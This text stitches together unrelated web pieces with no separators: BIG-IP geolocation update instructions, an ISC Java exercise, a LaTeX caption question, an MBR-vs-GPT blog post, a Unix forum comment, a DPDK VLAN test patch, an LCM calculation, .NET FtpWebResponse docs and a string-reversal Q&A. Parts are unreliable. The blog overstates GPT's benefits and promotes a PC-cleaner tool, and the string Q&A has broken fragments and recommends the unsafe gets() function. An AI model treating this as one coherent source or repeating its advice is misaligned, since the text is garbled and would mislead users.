For a CNAME query against a CNAME wide IP with a CNAME pool, you can use Topology load balancing at the wide IP level to make a pool selection, given that matching topology entries are configured to specify a CNAME pool on the wide IP. However, when using Topology load balancing at the pool level to make pool member selections, the BIG-IP® system relies on a metrics pull-up to get the topology scores needed to pick a pool member because the pool members are non-terminal.
If the pool members are terminal members (for example, on an A or AAAA type pool), then you can use them to match against the topology entries and get scores. But Topology load balancing cannot be used to get scores for non-terminal members without doing a metrics pull-up because there is no way to specify a wide IP or DNS name in a given topology entry. Therefore, for a CNAME query against a CNAME wide IP with a CNAME pool, you can use Topology load balancing to pick a pool at the wide IP level, but it will not be used (even if configured) at the pool level to pick a pool member because the BIG-IP system will not perform a metrics pull-up.
About IP geolocation data
The BIG-IP system uses an IP geolocation database to determine the origin of DNS requests. The database included with the BIG-IP system provides geolocation data for IPv6 addresses at the continent and country levels. It also provides geolocation data for IPv4 addresses at the continent, country, state, ISP, and organization levels. The state-level data is worldwide, and thus includes designations in other countries that correspond to the U.S. state-level in the geolocation hierarchy, such as, provinces in Canada.
Note: If you require geolocation data at the city-level, contact your F5 Networks sales representative to purchase additional database files.
About topology records and IP geolocation data
The BIG-IP® system uses an IP geolocation database to determine the IP addresses that match the geographic names that you define in a topology record, such as continent and country.
Downloading and installing updates to the IP geolocation data
You can download a monthly update to the IP geolocation database from F5 Networks. The BIG-IP system uses the IP geolocation database to determine the origin of DNS name resolution requests.
1. Log in to the F5 Networks customer web site at http://downloads.f5.com, and click Find a Download.
2. In the F5 Product Family column, find BIG-IP, and then in the Product Line column, click BIG-IP v11.x/Virtual Edition.
3. Select a version from the list preceding the table.
4. In the Name column, click GeolocationUpdates.
5. Click I Accept to accept the license.
6. In the Filename column, click the name of the most recent compressed file that you want to download.
7. In the Ready to Download table, click the download method that you want to use.
8. In the dialog box, click OK.
9. Select the directory in which you want to save the compressed file, and then decompress the file to save the RPM files on the system.
10. To install and load one of the RPM files, run this command (the path and file name are case-sensitive):
geoip_update_data -f </path to RPM file and file name >.
The system installs and loads the specified database file.
11. Repeat step 10 for each of the RPM files that you saved to the system in step 9.
You can access the ISP and organization-level geolocation data for IPv4 addresses only using the iRules whereis command.
Reloading default geolocation data using the Configuration utility
Before you reload the default geolocation data, delete the RPM files that are in the /shared/GeoIP directory.
To uninstall an update to the IP geolocation database, reload the default geolocation database files using the Configuration utility.
1. At the BASH prompt, run this command to query the RPM database and determine what geolocation data is installed:
rpm -qa --dbpath /shared/lib/rpm/
The system returns a list of RPMs, for example:
geoip-data-ISP-1.0.0-20110203.61.0
geoip-data-Region2-1.0.0-20110203.61.0
geoip-data-Org-1.0.0-20110203.61.0
2. To uninstall the RPMs, run this command for each RPM in the list:
rpm -e --dbpath /shared/lib/rpm/ <name of file>
For example, to uninstall geoip-data-ISP-1.0.0-20110203.61.0, run this command: rpm -e --dbpath /shared/lib/rpm/ geoip-data-ISP-1.0.0-20110203.61.0
3. To remove the symlink in the /shared/GeoIP directory, run this command:
rm -f /shared/GeoIP/*
4. Log on to the Configuration utility.
5. On the Main tab, click System > Configuration .
6. In the Geolocation area, click Reload in the Operations setting.
The system reloads the default geolocation database files that are stored in /usr/share/GeoIP.
Reloading default geolocation data using tmsh
To uninstall an update to the IP geolocation database, delete the RPM files, and then reload the default geolocation database files using tmsh.
1. At the BASH prompt, to query the RPM database and determine what geolocation data is installed, run this command:
rpm -qa --dbpath /shared/lib/rpm/
The system returns a list of RPMs, for example:
geoip-data-ISP-1.0.0-20110203.61.0
geoip-data-Region2-1.0.0-20110203.61.0
geoip-data-Org-1.0.0-20110203.61.0
2. To uninstall the RPMs, for each RPM in the list, run this command:
rpm -e --dbpath /shared/lib/rpm/ <name of file>
For example, to uninstall geoip-data-ISP-1.0.0-20110203.61.0, run this command: rpm -e --dbpath /shared/lib/rpm/ geoip-data-ISP-1.0.0-20110203.61.0
3. To remove the symlink in the /shared/GeoIP directory, run this command:
rm -f /shared/GeoIP/*
4. Log on to tmsh.
5. Run this command:
load / sys geoip
The system reloads the default geolocation database files that are stored in /usr/share/GeoIP.
Exchange Alphabets ISC 2013 Theory
Design a class Exchange to accept a sentence and interchange the first alphabet with the last alphabet for each word in the sentence, with single letter words remaining unchanged. The words in the input sentence are separated by a single blank space and terminated by a full stop.
Example:
INPUT: It is a warm day.
OUTPUT: tI si a marw yad
Some of the data members and member functions are given below:
Class name: Exchange
Data members/instance variables:
sent: stores the sentence.
rev: to store the new sentence.
size: stores the length of the sentence.
Member functions:
Exchange(): default constructor.
void readSentence(): to accept the sentence.
void exFirstLast(): extract each word and interchange the first and last alphabet of the word and form a new sentence rev using the changed words.
void display(): display the original sentence along with the new changed sentence.
Specify the class Exchange giving details of the constructor, void readSentence(), void exFirstLast() and void display(). Define the main() function to create an object and call the functions accordingly to enable the task.
import java.io.*;
class Exchange{
    private String sent;
    private String rev;
    private int size;

    public Exchange(){
        sent = new String();
        rev = new String();
        size = 0;
    }

    public void readSentence()throws IOException{
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        System.out.print("Sentence: ");
        sent = br.readLine();
        sent = sent.trim();
        size = sent.length();
    }

    public void exFirstLast(){
        String word = new String();
        for(int i = 0; i < size; i++){
            char ch = sent.charAt(i);
            // A space or terminating punctuation marks the end of a word
            if(ch == ' ' || ch == '.' || ch == '?' || ch == '!'){
                if(word.length() == 1){
                    // Single-letter words remain unchanged
                    rev += word + " ";
                    word = new String();
                }
                else{
                    // Interchange the first and last characters of the word
                    int len = word.length();
                    char first = word.charAt(0);
                    char last = word.charAt(len - 1);
                    String middle = word.substring(1, len - 1);
                    rev += last + middle + first + " ";
                    word = new String();
                }
            }
            else
                word += ch;
        }
        rev = rev.trim();
    }

    public void display(){
        System.out.println("Original sentence: " + sent);
        System.out.println("New sentence: " + rev);
    }

    public static void main(String args[])throws IOException{
        Exchange obj = new Exchange();
        obj.readSentence();
        obj.exFirstLast();
        obj.display();
    }
}
2 thoughts on “Exchange Alphabets ISC 2013 Theory
1. Sir,a question is given which states that:
Given the boolean function F(A, B, C, D) = ∑(0, 2,3,6,8,10,11,14,15):
i) Reduce the above expression by using 4-variable Karnaugh Map, showing the various groups (i.e. octals, quads and pairs).
ii) Draw the logic gate diagram for the reduced expression. Assume that the variables and their complements are available as inputs.
Sir,can you show me the logic circuit and the 4-variable K-map of the above question ?
TeX - LaTeX Stack Exchange is a question and answer site for users of TeX, LaTeX, ConTeXt, and related typesetting systems. It's 100% free, no registration required.
I am required to typeset some (long) figure captions in the "half-title page(s)" as they do not fit in one page with the figure; for a similar example see this link (except that on the first page I would put the caption instead of "Appendix").
https://etd.helpdesk.ufl.edu/present/halftitle.html
In other words, I need to typeset captions as if they are texts (except that the caption title needs to appear in the \listoffigures, which is taken care of by \captionof from the caption package.) However my situation is a bit different:
1. The caption is very long and it does not fit on one page, so I need more than one "half-title page(s)" and cannot use the \captionof command. How can I manually typeset a caption as if it is text and have the entry appear in the LOF?
2. Every page after the first half-title page needs to have a header showing "Figure X: continued", including the page with the figure on it. How can I enable headers only for these several "half-title pages", but not for the rest of the document? Even a more "manual" implementation would suffice.
I've searched and attempted a bit but nothing really satisfies the requirement. Thanks for any suggestions! Here is a MNWE for your convenience:
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\begin{document}
\listoffigures
\doublespacing
\clearpage
Figure 1: \lipsum*
% however for the 2nd page of caption, a header "Figure 1: continued"
%on top of each page is required
\clearpage
\centering{Figure 1: continued}
% how to get this Figure X showing the right number as "Figure 1",
% if I cannot do this with a header (but only in this part of document)?
\begin{figure}
\end{figure}
\end{document}
(I know this doesn’t help really:) Are you sure that you want to do this? In my opinion a caption should be a short text explaining an object. If there is more to say about the object this should be done in the main/body text. So I would say it’s not a TeX but a contentual/structural problem to be solved. – Tobi Oct 22 '11 at 20:39
Even though it may seem trivial, it is always best to compose a MWE that illustrates the problem including the \documentclass so that those trying to help don't have to recreate it. – Peter Grill Oct 22 '11 at 20:40
@Peter Grill: A MWE is in preparation. – YIchun Oct 22 '11 at 21:30
@cmhughes: I am trying out \addtocontentsline idea, will use it in an MWE. Thanks! – YIchun Oct 22 '11 at 21:32
@Tobi: This is a complex figure that is a composition of multiple subfigures. They were made into one large figure for reasons of clarity. If these caption texts are required to be double spaced, it is quite common for the necessary caption to go beyond the space available on one page. – YIchun Oct 22 '11 at 21:42
up vote 1 down vote accepted
I'm not entirely sure I have understood the question, but here is a first attempt using fancyhdr
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\usepackage{fancyhdr}
\begin{document}
\listoffigures
\doublespacing
\clearpage
\chead{Figure \ref{fig:testfigure} continued}
\pagestyle{fancy}
\thispagestyle{plain}
Figure \ref{fig:testfigure}: \lipsum*
% however for the 2nd page of caption, a header "Figure 1: continued"
%on top of each page is required
\clearpage
% how to get this Figure X showing the right number as "Figure 1",
% if I cannot do this with a header (but only in this part of document)?
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption{My figure}
\label{fig:testfigure}
\end{figure}
\end{document}
Note that
• \pagestyle{fancy} turns on the header
• \thispagestyle{plain} says that this page should be plain (without a header)
This approach is quite manual and will need some care... Perhaps others have a more robust solution.
Here is more of an environment-based approach (not a great solution, as the 'caption' counter isn't actually linked to the Figure counter)- use carefully! Personally I would use the first part of my solution.
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\usepackage{fancyhdr} % headers
\usepackage{placeins} % provides \FloatBarrier
\usepackage{flafter} % ensures figures don't appear before
% they appear in the text
\newcounter{pseudocaptioncount}
\setcounter{pseudocaptioncount}{0}
\newenvironment{pseudocaption}%
{%
\FloatBarrier
\clearpage
\refstepcounter{pseudocaptioncount}%
\thispagestyle{plain}%
\chead{Figure \thepseudocaptioncount\, continued}
Figure \thepseudocaptioncount:%
}%
{}
\begin{document}
\listoffigures
% set the pagestyle as fancy
\pagestyle{fancy}
\doublespacing
\begin{pseudocaption}
\lipsum*
\end{pseudocaption}
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption[Short caption]{}
\end{figure}
\begin{pseudocaption}
\lipsum*
\end{pseudocaption}
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption[Another short caption]{}
\end{figure}
\end{document}
This works except that in the place of Figure 1, I got Figure ??. I added/moved \phantomsection\lable{fig:testfigure} to the first page of the caption, however, LaTeX still complains about unsolved labels. Also, which counter do I need to increment to utilize the automatic labeling mechanism of LaTeX. – YIchun Oct 23 '11 at 0:05
@YIchun: Remember to compile twice :) – cmhughes Oct 23 '11 at 0:15
I did compile many times on your 1st example and always got warningand ?? in pdf, and it turned out that's due to my deletion of the \label line. However, your 2nd example worked perfectly! – YIchun Oct 23 '11 at 0:47
MBR vs GPT: Which One to Choose?
Setting up an HDD or SSD Partition can be difficult.
And it isn’t anywhere close to choosing between the two Partition Table MBR & GPT.
It’s like crushing a stone using BARE HANDS.
It’s difficult, but it gets easier once you know the trick, or in this case, the FACTS that you can read to find the RIGHT answer.
The answer that suits your CASE. So, going ahead in this post, I’ll tell you:
✅What is a PARTITION?
✅How can you the Partition Table of a DISK?
✅MBR vS GPT?
✅And lastly, my take on this MBR vs GPT battle.
Now, let’s get started:
What is a Partition?
When you virtually divide an HDD or SSD into multiple drives, the process is called PARTITION. Depending on user requirements, each partition can vary in size.
Some partitions are used to install an OPERATING SYSTEM & some are used to store user data and files. Let me explain this to you with an example –
In a Windows PC, the labeled ‘C’ drive is used as a partition where Windows OS, third-party programs are installed (Commonly). Then it further has a small recovery partition to restore the system.
Similarly, labeled disk: D, E… to store user data & files.
How to Check Which Partition Table Your Disk Is Using
You can easily check the Partition table of your disk using an in-built disk management tool.
Using Disk Management
• First, hit ‘Windows + R’ on your keyboard & in the search box, type “diskmgmt.msc” and press ENTER.
• Locate the disk you want to check in the Disk Management window. Right-click it and select “Properties.”
• Click over to the “Volumes” tab. To the right of “Partition style,” you’ll see either “Master Boot Record (MBR)” or “GUID Partition Table (GPT),” depending on which the disk is using.
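If you’d rather skip the GUI, PowerShell (available on Windows 8 / Server 2012 and later) can report the same information in one line. This is just an illustrative command; the column you care about is PartitionStyle:
Get-Disk | Select-Object Number, FriendlyName, PartitionStyle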
MBR vs GPT: Which One Is Better?
It isn’t that easy to choose between the two MBR & GPT partition. However, there are certain sets of conditions where you can use either of them as a partition.
When to Choose GPT Partition
✅An MBR disk can support up to 4 primary partitions at a time; a GPT disk, on the other hand, supports up to 128 partitions on Windows. So, if you need more partitions, it would be wise to choose GPT over the MBR partition.
✅If your HDD usage is limited to 2 TB or less, then stick with the MBR partition. But if you need larger storage space, especially to employ a 4K native sector for editing high-quality videos, then go with GPT.
✅Where does security stand in your checklist? If it’s at the TOP, then GPT disk is the most suitable option for you. GPT disks use primary and backup partition tables for redundancy and CRC32 fields for improved partition data structure integrity. Thereby, providing better security than an MBR partition.
✅Firstly, head over to the Boot Menu to see whether your PC supports UEFI. If it does, switch the default windows drive from MBR to GPT. This will miraculously boot the WINDOWS PC faster & make it much more STABLE than it was ever before.
When to Choose MBR
✅Windows can only boot from a GPT disk on a UEFI-based system. And if you’ve got an older 32-bit Windows on a legacy BIOS machine, don’t bother putting it on a GPT disk, as it simply won’t be able to boot from it.
✅As I said earlier, go to the Legacy boot mode to see if your motherboard supports UEFI boot or not. If it doesn’t, stick with the MBR disk as this can keep Windows bootable.
Well, I’ve answered your question on what to choose between MBR & GPT. I’ve laid out all the OPTIONS, FACTS in front of you.
The final choice is yours. What do you WANT? An MBR or GPT partition?
Do let me know about it in the comments section given below.
Final Verdict – SHOULD YOU UPGRADE?
Despite all the Valid pointer I specified in the MBR vs GPT battle, are you still confused about which one to choose?
Well, allow me to share my HONEST opinion with you.
If any of your disks is still using an MBR partition table, you might be dying to upgrade to the newer GPT standard.
But I won’t recommend you to do this.
YOU KNOW WHY?
Because why would you want to risk your fine-running PC? It’s easy to destroy the MBR sector of the drive & it’s nearly impossible to boot that up again.
And once you’re in the MIX, you would end up requiring a USB drive to create a recovery disk with Windows or Linux.
Even I tried it once out of curiosity, but I ended up regretting it & cursing myself as the issue caused a real headache.
That being said, there are still some conditions that you can monitor to use or upgrade over the MBR or GPT disks. You can check out in the previous section where I’ve distinguished an MBR vs GPT battle.
And in the meanwhile, you can use Microsoft Total PC Cleaner to clean up your PC from cookies, cache & unnecessary files.
Article:
From Exile to X11: A Journey Through Time
Subject: Command line is no closer than GUI
Date: 2003-03-17 12:55:47
From: anonymous2
Quote:
----
Interestingly, many people think of Terminal as "an application that lets you type commands." In a way, this is true, but it's useful to think of Terminal as a window into the true operating system itself.
----
Actually this couldn't be more false. Neither
the GUI or the command line is closer to the true operating system.
I have been using Unix systems for >10years now, and it is only in the last 2-3 years that I came to realize that.
A shell is no closer to the system/kernel than an X11/Cocoa/Carbon/... application is.
A failure to understand that shows a lack of understanding of how unix systems are structured.
Eric
1. Command line is no closer than GUI---hear, hear!
2003-03-17 16:23:24 halliday [View]
[v10,2/3] dts: VLAN test suite implementation
Message ID [email protected] (mailing list archive)
State Superseded, archived
Delegated to: Thomas Monjalon
Headers
Series [v10,1/3] dts: add VLAN methods to testpmd shell |
Checks
Context Check Description
ci/checkpatch success coding style OK
Commit Message
Dean Marx July 3, 2024, 4:50 p.m. UTC
Test suite for verifying VLAN filtering, stripping, and insertion
functionality on Poll Mode Driver.
Signed-off-by: Dean Marx <[email protected]>
---
dts/tests/TestSuite_vlan.py | 171 ++++++++++++++++++++++++++++++++++++
1 file changed, 171 insertions(+)
create mode 100644 dts/tests/TestSuite_vlan.py
Comments
Jeremy Spewock July 9, 2024, 9:22 p.m. UTC | #1
I just had one minor comment, otherwise:
Reviewed-by: Jeremy Spewock <[email protected]>
On Wed, Jul 3, 2024 at 12:51 PM Dean Marx <[email protected]> wrote:
<snip>
> +
> + def vlan_setup(self, port_id: int, filtered_id: int) -> TestPmdShell:
> + """Setup method for all test cases.
> +
> + Args:
> + shell: TestPmdShell object that is being used inside test case.
It seems this argument was removed from the method, it's probably
better to remove it from this doc-string as well.
> + port_id: Number of port to use for setup.
> + filtered_id: ID to be added to the vlan filter list.
> + """
> + testpmd = TestPmdShell(node=self.sut_node)
> + testpmd.set_forward_mode(SimpleForwardingModes.mac)
> + testpmd.set_promisc(port_id, False)
> + testpmd.vlan_filter_set(port=port_id, on=True)
> + testpmd.rx_vlan(vlan=filtered_id, port=port_id, add=True)
> + return testpmd
> +
<snip>
> 2.44.0
>
Patch
diff --git a/dts/tests/TestSuite_vlan.py b/dts/tests/TestSuite_vlan.py
new file mode 100644
index 0000000000..903398a8a8
--- /dev/null
+++ b/dts/tests/TestSuite_vlan.py
@@ -0,0 +1,171 @@
+# SPDX-License-Identifier: BSD-3-Clause
+# Copyright(c) 2024 University of New Hampshire
+
+"""Test the support of VLAN Offload Features by Poll Mode Drivers.
+
+The test suite ensures that with the correct configuration, a port
+will not drop a VLAN tagged packet. In order for this to be successful,
+packet header stripping and packet receipts must be enabled on the Poll Mode Driver.
+The test suite checks that when these conditions are met, the packet is received without issue.
+The suite also checks to ensure that when these conditions are not met, as in the cases where
+stripping is disabled, or VLAN packet receipts are disabled, the packet is not received.
+Additionally, it checks the case where VLAN header insertion is enabled in transmitted packets,
+which should be successful if the previous cases pass.
+
+"""
+
+from scapy.layers.l2 import Dot1Q, Ether # type: ignore[import-untyped]
+from scapy.packet import Raw # type: ignore[import-untyped]
+
+from framework.remote_session.testpmd_shell import SimpleForwardingModes, TestPmdShell
+from framework.test_suite import TestSuite
+
+
+class TestVlan(TestSuite):
+ """DPDK VLAN test suite.
+
+ Ensures VLAN packet reception, stripping, and insertion on the Poll Mode Driver
+ when the appropriate conditions are met. The suite contains four test cases:
+
+ 1. VLAN reception no stripping - verifies that a vlan packet with a tag
+ within the filter list is received.
+ 2. VLAN reception stripping - verifies that a vlan packet with a tag
+ within the filter list is received without the vlan tag.
+ 3. VLAN no reception - verifies that a vlan packet with a tag not within
+ the filter list is dropped.
+ 4. VLAN insertion - verifies that a non vlan packet is received with a vlan
+ tag when insertion is enabled.
+ """
+
+ def set_up_suite(self) -> None:
+ """Set up the test suite.
+
+ Setup:
+ Verify that at least two ports are open for session.
+ """
+ self.verify(len(self._port_links) > 1, "Not enough ports")
+
+ def send_vlan_packet_and_verify(self, should_receive: bool, strip: bool, vlan_id: int) -> None:
+ """Generate a vlan packet, send and verify packet with same payload is received on the dut.
+
+ Args:
+ should_receive: Indicate whether the packet should be successfully received.
+ strip: Indicates whether stripping is on or off, and when the vlan tag is
+ checked for a match.
+ vlan_id: Expected vlan ID.
+ """
+ packet = Ether() / Dot1Q(vlan=vlan_id) / Raw(load="xxxxx")
+ received_packets = self.send_packet_and_capture(packet)
+ test_packet = None
+ for packet in received_packets:
+ if b"xxxxx" in packet.load:
+ test_packet = packet
+ break
+ if should_receive:
+ self.verify(
+ test_packet is not None, "Packet was dropped when it should have been received"
+ )
+ if test_packet is not None:
+ if strip:
+ self.verify(
+ not test_packet.haslayer(Dot1Q), "Vlan tag was not stripped successfully"
+ )
+ else:
+ self.verify(
+ test_packet.vlan == vlan_id,
+ "The received tag did not match the expected tag",
+ )
+ else:
+ self.verify(
+ test_packet is None,
+ "Packet was received when it should have been dropped",
+ )
+
+ def send_packet_and_verify_insertion(self, expected_id: int) -> None:
+ """Generate a packet with no vlan tag, send and verify on the dut.
+
+ Args:
+ expected_id: The vlan id that is being inserted through tx_offload configuration.
+ """
+ packet = Ether() / Raw(load="xxxxx")
+ received_packets = self.send_packet_and_capture(packet)
+ test_packet = None
+ for packet in received_packets:
+ if b"xxxxx" in packet.load:
+ test_packet = packet
+ break
+ self.verify(test_packet is not None, "Packet was dropped when it should have been received")
+ if test_packet is not None:
+ self.verify(test_packet.haslayer(Dot1Q), "The received packet did not have a vlan tag")
+ self.verify(
+ test_packet.vlan == expected_id, "The received tag did not match the expected tag"
+ )
+
+ def vlan_setup(self, port_id: int, filtered_id: int) -> TestPmdShell:
+ """Setup method for all test cases.
+
+ Args:
+ shell: TestPmdShell object that is being used inside test case.
+ port_id: Number of port to use for setup.
+ filtered_id: ID to be added to the vlan filter list.
+ """
+ testpmd = TestPmdShell(node=self.sut_node)
+ testpmd.set_forward_mode(SimpleForwardingModes.mac)
+ testpmd.set_promisc(port_id, False)
+ testpmd.vlan_filter_set(port=port_id, on=True)
+ testpmd.rx_vlan(vlan=filtered_id, port=port_id, add=True)
+ return testpmd
+
+ def test_vlan_receipt_no_stripping(self) -> None:
+ """Ensure vlan packet is dropped when receipts are enabled and header stripping is disabled.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(True, strip=False, vlan_id=1)
+ testpmd.close()
+
+ def test_vlan_receipt_stripping(self) -> None:
+ """Ensure vlan packet received with no tag when receipts and header stripping are enabled.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.vlan_strip_set(port=0, on=True)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(should_receive=True, strip=True, vlan_id=1)
+ testpmd.close()
+
+ def test_vlan_no_receipt(self) -> None:
+ """Ensure vlan packet dropped when filter is on and sent tag not in the filter list.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(should_receive=False, strip=False, vlan_id=2)
+ testpmd.close()
+
+ def test_vlan_header_insertion(self) -> None:
+ """Ensure that vlan packet is received with the correct inserted vlan tag.
+
+ Test:
+ Create an interactive testpmd shell and verify a non-vlan packet.
+ """
+ testpmd = TestPmdShell(node=self.sut_node)
+ testpmd.set_forward_mode(SimpleForwardingModes.mac)
+ testpmd.set_promisc(port=0, on=False)
+ testpmd.port_stop_all()
+ testpmd.tx_vlan_set(port=1, vlan=51)
+ testpmd.port_start_all()
+ testpmd.start()
+
+ self.send_packet_and_verify_insertion(expected_id=51)
+ testpmd.close()
What is the LCM of 72 and 3430?
The lcm of 72 and 3430 is 123480.
Steps to find LCM
1. Find the prime factorization of 72
72 = 2 × 2 × 2 × 3 × 3
2. Find the prime factorization of 3430
3430 = 2 × 5 × 7 × 7 × 7
3. Multiply each factor the greater number of times it occurs in steps i) or ii) above to find the lcm:
LCM = 2 × 2 × 2 × 3 × 3 × 5 × 7 × 7 × 7
4. LCM = 123480
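If you want to reproduce this calculation in code, the short Python sketch below follows the same prime-factorization idea (it is an illustration added here, not part of the calculator itself):
def lcm(a, b):
    # Collect the prime factors of a number together with their exponents
    def factorize(n):
        factors = {}
        d = 2
        while d * d <= n:
            while n % d == 0:
                factors[d] = factors.get(d, 0) + 1
                n //= d
            d += 1
        if n > 1:
            factors[n] = factors.get(n, 0) + 1
        return factors
    fa, fb = factorize(a), factorize(b)
    result = 1
    # Multiply each factor the greater number of times it occurs in either factorization
    for p in set(fa) | set(fb):
        result *= p ** max(fa.get(p, 0), fb.get(p, 0))
    return result

print(lcm(72, 3430))  # prints 123480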
MathStep (Works offline)
Download our mobile app and learn how to find LCM of upto four numbers in your own time:
Android and iPhone/ iPad
© everydaycalculation.com
This documentation is archived and is not being maintained.
FtpWebResponse Methods
(see also Protected Methods )
Name Description
Public method Close Overridden. Frees the resources held by the response.
Public method CreateObjRef Creates an object that contains all the relevant information required to generate a proxy used to communicate with a remote object. (Inherited from MarshalByRefObject.)
Public method Equals Overloaded. Determines whether two Object instances are equal. (Inherited from Object.)
Public method GetHashCode Serves as a hash function for a particular type. GetHashCode is suitable for use in hashing algorithms and data structures like a hash table. (Inherited from Object.)
Public method GetLifetimeService Retrieves the current lifetime service object that controls the lifetime policy for this instance. (Inherited from MarshalByRefObject.)
Public method GetResponseStream Overridden. Retrieves the stream that contains response data sent from an FTP server.
Public method GetType Gets the Type of the current instance. (Inherited from Object.)
Public method InitializeLifetimeService Obtains a lifetime service object to control the lifetime policy for this instance. (Inherited from MarshalByRefObject.)
Public method Static ReferenceEquals Determines whether the specified Object instances are the same instance. (Inherited from Object.)
Public method ToString Returns a String that represents the current Object. (Inherited from Object.)
Top
Name Description
Protected method Finalize Allows an Object to attempt to free resources and perform other cleanup operations before the Object is reclaimed by garbage collection. (Inherited from Object.)
Protected method GetObjectData Populates a SerializationInfo with the data that is needed to serialize the target object. (Inherited from WebResponse.)
Protected method MemberwiseClone Overloaded. (Inherited from MarshalByRefObject.)
Top
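The following minimal C# sketch shows how these members are typically used together to download a file over FTP. The URI is a placeholder and anonymous access is assumed; it is offered as an illustration rather than as part of the reference itself.
using System;
using System.IO;
using System.Net;

class FtpExample
{
    static void Main()
    {
        // Create the request for a (placeholder) file on a (placeholder) server.
        FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://ftp.example.com/readme.txt");
        request.Method = WebRequestMethods.Ftp.DownloadFile;

        using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
        using (Stream stream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(stream))
        {
            Console.WriteLine(reader.ReadToEnd());
            Console.WriteLine("Status: {0}", response.StatusDescription);
        }
        // Disposing the response at the end of the using block releases the connection,
        // which is what calling Close() does explicitly.
    }
}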
How Do I Reverse A String?
How do you reverse a string in Java?
How to reverse a String in Java:
public class StringFormatter {
    public static String reverseString(String str) {
        StringBuilder sb = new StringBuilder(str);
        sb.reverse();
        return sb.toString();
    }
}
Which function is used to reverse the string?
strrevThe strrev() function is used to reverse the given string. Syntax: char *strrev(char *str);
How do you reverse a string without reverse function?
Example to reverse a string in Java by using a static method:
import java.util.Scanner;
public class ReverseStringExample3 {
    public static void main(String[] arg) {
        ReverseStringExample3 rev = new ReverseStringExample3();
        Scanner sc = new Scanner(System.in);
        System.out.print("Enter a string : ");
More items…
Can you Scanf a string in C?
You can use the scanf() function to read a string. The scanf() function reads the sequence of characters until it encounters whitespace (space, newline, tab, etc.).
How do you reverse a string?
Method 1: Reverse a string by swapping the characters
Input the string from the user.
Find the length of the string. The index of the last character is one less than the length of the string. …
Repeat the below steps from i = 0 to the entire length of the string.
rev[i] = str[j]
Print the reversed string.
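A compact C version of this swap-based method might look like the following (an illustrative sketch, not taken from the quoted source):
#include <stdio.h>
#include <string.h>

int main(void) {
    char str[100];
    printf("Enter a string to reverse\n");
    scanf("%99s", str);
    int i = 0, j = strlen(str) - 1;
    while (i < j) {
        /* swap the characters at both ends and move toward the middle */
        char tmp = str[i];
        str[i++] = str[j];
        str[j--] = tmp;
    }
    printf("Reverse of the string: %s\n", str);
    return 0;
}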
How can I reverse a string without TEMP variable?
Algorithm to Reverse String Without Temporary Variable
• Store start index in low and end index in high.
• Here, without creating a temp variable to swap characters, we use xor(^).
• Traverse the input string "s".
• Swap from first variable to end using xor. …
• Return the final output string.
How do you reverse a string in a for loop?
Reverse The String Using FOR Loop in C:
//Reverse the String using FOR Loop.
#include <stdio.h>
#include <string.h>
int main(void) {
    char *str = "ForgetCode";
    printf("Reverse the String:");
    for (int i = (strlen(str) - 1); i >= 0; i--) {
        printf("%c", str[i]);
    …
Can we convert StringBuffer to string?
The toString() method of StringBuffer class can be used to convert StringBuffer content to a String. This method returns a String object that represents the contents of StringBuffer. As you can observe that the string object represents the same sequence that we had in StringBuffer.
Can we convert StringBuilder to string in Java?
To convert a StringBuilder to String value simple invoke the toString() method on it. Instantiate the StringBuilder class. Append data to it using the append() method. Convert the StringBuilder to string using the toString() method.
What does reverse () do in Python?
reverse() is an inbuilt method in Python programming language that reverses objects of list in place. Returns: The reverse() method does not return any value but reverse the given object from the list.
How do you read a string?
A string is an array of characters. It is terminated by the null character ('\0').
• Read string in C using scanf() with %s.
• Read string in C using scanf() with %c.
• Read string in C using scanset conversion code ( […] )
• Read string in C using scanset with [^\n] (single line)
• Multiline input using scanset.
Can you reverse a string in Python?
There is no built-in function to reverse a String in Python. … The fastest (and easiest?) way is to use a slice that steps backwards, [::-1].
How do you reverse a string in C?
Reverse a string in C using strrev:
#include <stdio.h>
#include <string.h>
int main() {
    char s[100];
    printf("Enter a string to reverse\n");
    gets(s);
    strrev(s);
    printf("Reverse of the string: %s\n", s);
    return 0;
}
How can I reverse a string in C++ without function?
C, C++ Program to Reverse a String without using the strrev Function
• Initialize a variable.
• Take an input from the user.
• Count the length of the input string, as we are not using any in-built function.
• Swap the position of the elements.
How do I reverse a string using reverse in C++?
How do you reverse a string?
• Using the built-in reverse function. C++ has an in-built reverse function, that can be called to reverse a string. …
• Using a loop. Within the main body of the function, a loop can be written to reverse a string. …
• Using a function. …
• Creating a new string.
What is reverse string?
Reverse a String using String Builder / String Buffer Class. StringBuffer and StringBuilder comprise of an inbuilt method reverse() which is used to reverse the characters in the StringBuffer. This method replaces the character sequence in the reverse order.
How do you reverse a number?
Where reverse is a variable representing the reverse of number.
• Step 1 — Isolate the last digit in number. lastDigit = number % 10. …
• Step 2 — Append lastDigit to reverse. reverse = (reverse * 10) + lastDigit. …
• Step 3 — Remove last digit from number. number = number / 10. …
• Iterate this process. while (number > 0)
How do I reverse a string in STL?
Let's see the simple example to reverse the given string:
#include <iostream>
#include <string>
#include <algorithm>
using namespace std;
int main() {
    string str = "Hello Myself Nikita";
    cout << "Before Reverse : " << str << endl;
    reverse(str.begin(), str.end());
    …
Why the string is immutable?
The string is Immutable in Java because String objects are cached in the String pool. … Mutable String would produce two different hashcodes at the time of insertion and retrieval if contents of String was modified after insertion, potentially losing the value object in the map.
How do you reverse a case in python?
The string swapcase() method converts all uppercase characters to lowercase and vice versa of the given string, and returns it. Here string_name is the string whose cases are to be swapped.
How do you reverse a string without reverse method in Python?
First of all, let's take a string and store it in a variable my_string.
my_string = ("Nitesh Jhawar")
str = ""
